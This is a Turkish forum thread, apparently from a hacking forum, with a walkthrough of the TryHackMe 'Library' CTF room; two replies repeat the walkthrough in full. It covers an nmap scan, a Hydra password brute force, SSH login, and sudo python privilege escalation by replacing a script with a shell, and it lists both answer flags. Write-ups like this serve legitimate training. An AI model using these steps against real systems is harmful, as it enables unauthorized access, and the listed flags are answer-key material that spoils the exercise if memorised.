TRYHACKME | Library Ctf

Türkiye.

Üye
28 Nis 2022
105
84
6v548jv.png

LİBRARY CTF
İLK OVPN BAĞLANTIMIZI GERÇEKLEŞTİRİYORUZ
ŞİMDİ TERMİNALE GEÇELİM

ADIM 1
NMAP TARAMASI

Terminale nmap -sS -sV -sC -O -Pn ipadresi girip enter diyin
ve sonuçları bekleyelim nmap bize açık portları sürümünü v.s gösterir
9vfah5k.jpg
Evet Sonuçlar Geldi 2 port açık 80 ve 22 portları ssh var genelde öyle olur zaten ve izin verilmeyen bi entry var bi ip
adresini tarayıcıya aratalım ipadresi/robots.txt aratın
nnnoyn5.jpg
Evet BruteForce Yapıcaz Hydra Yani

Adım 2 HYDRA

kok2git.jpg
Evet Bu Satırı Terminale Aynen Böyle girelim meliodas kullanıcısın şifresini alıcaz
bu işlem nmap tan daha uzun sürer sabırlı olun....
on7x4ef.jpg
evet sonuçlar yukarıdaki gibidir şifremiz
iloveyou1
şimdi yeni sayfa
ADIM 3 USER.TXT FLAG BULMA
TERMİNAL
ssh meliodas@ipadresi
yes
password isteyecek iloveyou1
whoami
meliodas
ls
bak.py user.txt
cat user.txt
6d488cbb3f111d135722c33cb635f4ec


ADIM 4 ROOT OLMA VE ROOT.TXT BULMA
pt19vam.jpg
cd /root
Permission denied alıyoruz yetki arttırmamız gerek
yeni sayfa
sudo -l
pyhton kullanıcaz



python | GTFOBins
evet yukarıdaki linkten shell komutunu bulup alın ama önce
rm bak.py
yes
ls
user.txt
touch bak.py
ls
bak.py user.txt
nano bak.py
o shell komutunu nano ya aynı aşağıdaki resim gibi yazalım
4j5nohl.jpg
BU İŞLEMİ NEDEN YAPTIM

orjinal bak.py dosyasını erişimine izni kapalı yani shell aktaramıyoruz o yüzden silip tekrar yeni bir bak.py oluşturduk
bak.py de 2. flag yani root.txt var
bu işemi yaptıktan sonra

TERMİNAL
sudo /usr/bin/python/ /home/meliodas/bak.py
whoami
root
cd /root
ls
root.txt
cat root.txt

e8c8c6c256c35515d1d344ee0488c617

ADIM 5 TRYHACKME ODASININ CEVAPLARI
1. SORU-
6d488cbb3f111d135722c33cb635f4ec
2. SORU-

e8c8c6c256c35515d1d344ee0488c617


34i6rgo.png
 

mitat1

Uzman üye
1 Eki 2022
1,075
753
SerasZen
6v548jv.png

LİBRARY CTF
İLK OVPN BAĞLANTIMIZI GERÇEKLEŞTİRİYORUZ
ŞİMDİ TERMİNALE GEÇELİM

ADIM 1
NMAP TARAMASI

Terminale nmap -sS -sV -sC -O -Pn ipadresi girip enter diyin
ve sonuçları bekleyelim nmap bize açık portları sürümünü v.s gösterir
9vfah5k.jpg
Evet Sonuçlar Geldi 2 port açık 80 ve 22 portları ssh var genelde öyle olur zaten ve izin verilmeyen bi entry var bi ip
adresini tarayıcıya aratalım ipadresi/robots.txt aratın
nnnoyn5.jpg
Evet BruteForce Yapıcaz Hydra Yani

Adım 2 HYDRA

kok2git.jpg
Evet Bu Satırı Terminale Aynen Böyle girelim meliodas kullanıcısın şifresini alıcaz
bu işlem nmap tan daha uzun sürer sabırlı olun....
on7x4ef.jpg
evet sonuçlar yukarıdaki gibidir şifremiz
iloveyou1
şimdi yeni sayfa
ADIM 3 USER.TXT FLAG BULMA
TERMİNAL
ssh meliodas@ipadresi
yes
password isteyecek iloveyou1
whoami
meliodas
ls
bak.py user.txt
cat user.txt
6d488cbb3f111d135722c33cb635f4ec


ADIM 4 ROOT OLMA VE ROOT.TXT BULMA
pt19vam.jpg
cd /root
Permission denied alıyoruz yetki arttırmamız gerek
yeni sayfa
sudo -l
pyhton kullanıcaz



python | GTFOBins
evet yukarıdaki linkten shell komutunu bulup alın ama önce
rm bak.py
yes
ls
user.txt
touch bak.py
ls
bak.py user.txt
nano bak.py
o shell komutunu nano ya aynı aşağıdaki resim gibi yazalım
4j5nohl.jpg
BU İŞLEMİ NEDEN YAPTIM

orjinal bak.py dosyasını erişimine izni kapalı yani shell aktaramıyoruz o yüzden silip tekrar yeni bir bak.py oluşturduk
bak.py de 2. flag yani root.txt var
bu işemi yaptıktan sonra

TERMİNAL
sudo /usr/bin/python/ /home/meliodas/bak.py
whoami
root
cd /root
ls
root.txt
cat root.txt

e8c8c6c256c35515d1d344ee0488c617

ADIM 5 TRYHACKME ODASININ CEVAPLARI
1. SORU-
6d488cbb3f111d135722c33cb635f4ec
2. SORU-

e8c8c6c256c35515d1d344ee0488c617


34i6rgo.png
Eline sağlık
 
23 Haz 2021
85
39
23
6v548jv.png

LİBRARY CTF
İLK OVPN BAĞLANTIMIZI GERÇEKLEŞTİRİYORUZ
ŞİMDİ TERMİNALE GEÇELİM

ADIM 1
NMAP TARAMASI

Terminale nmap -sS -sV -sC -O -Pn ipadresi girip enter diyin
ve sonuçları bekleyelim nmap bize açık portları sürümünü v.s gösterir
9vfah5k.jpg
Evet Sonuçlar Geldi 2 port açık 80 ve 22 portları ssh var genelde öyle olur zaten ve izin verilmeyen bi entry var bi ip
adresini tarayıcıya aratalım ipadresi/robots.txt aratın
nnnoyn5.jpg
Evet BruteForce Yapıcaz Hydra Yani

Adım 2 HYDRA

kok2git.jpg
Evet Bu Satırı Terminale Aynen Böyle girelim meliodas kullanıcısın şifresini alıcaz
bu işlem nmap tan daha uzun sürer sabırlı olun....
on7x4ef.jpg
evet sonuçlar yukarıdaki gibidir şifremiz
iloveyou1
şimdi yeni sayfa
ADIM 3 USER.TXT FLAG BULMA
TERMİNAL
ssh meliodas@ipadresi
yes
password isteyecek iloveyou1
whoami
meliodas
ls
bak.py user.txt
cat user.txt
6d488cbb3f111d135722c33cb635f4ec


ADIM 4 ROOT OLMA VE ROOT.TXT BULMA
pt19vam.jpg
cd /root
Permission denied alıyoruz yetki arttırmamız gerek
yeni sayfa
sudo -l
pyhton kullanıcaz



python | GTFOBins
evet yukarıdaki linkten shell komutunu bulup alın ama önce
rm bak.py
yes
ls
user.txt
touch bak.py
ls
bak.py user.txt
nano bak.py
o shell komutunu nano ya aynı aşağıdaki resim gibi yazalım
4j5nohl.jpg
BU İŞLEMİ NEDEN YAPTIM

orjinal bak.py dosyasını erişimine izni kapalı yani shell aktaramıyoruz o yüzden silip tekrar yeni bir bak.py oluşturduk
bak.py de 2. flag yani root.txt var
bu işemi yaptıktan sonra

TERMİNAL
sudo /usr/bin/python/ /home/meliodas/bak.py
whoami
root
cd /root
ls
root.txt
cat root.txt

e8c8c6c256c35515d1d344ee0488c617

ADIM 5 TRYHACKME ODASININ CEVAPLARI
1. SORU-
6d488cbb3f111d135722c33cb635f4ec
2. SORU-

e8c8c6c256c35515d1d344ee0488c617


34i6rgo.png
ELİNE EMEĞİNE SAĞLIK
 
Üst

Turkhackteam.org internet sitesi 5651 sayılı kanun’un 2. maddesinin 1. fıkrasının m) bendi ile aynı kanunun 5. maddesi kapsamında "Yer Sağlayıcı" konumundadır. İçerikler ön onay olmaksızın tamamen kullanıcılar tarafından oluşturulmaktadır. Turkhackteam.org; Yer sağlayıcı olarak, kullanıcılar tarafından oluşturulan içeriği ya da hukuka aykırı paylaşımı kontrol etmekle ya da araştırmakla yükümlü değildir. Türkhackteam saldırı timleri Türk sitelerine hiçbir zararlı faaliyette bulunmaz. Türkhackteam üyelerinin yaptığı bireysel hack faaliyetlerinden Türkhackteam sorumlu değildir. Sitelerinize Türkhackteam ismi kullanılarak hack faaliyetinde bulunulursa, site-sunucu erişim loglarından bu faaliyeti gerçekleştiren ip adresini tespit edip diğer kanıtlarla birlikte savcılığa suç duyurusunda bulununuz.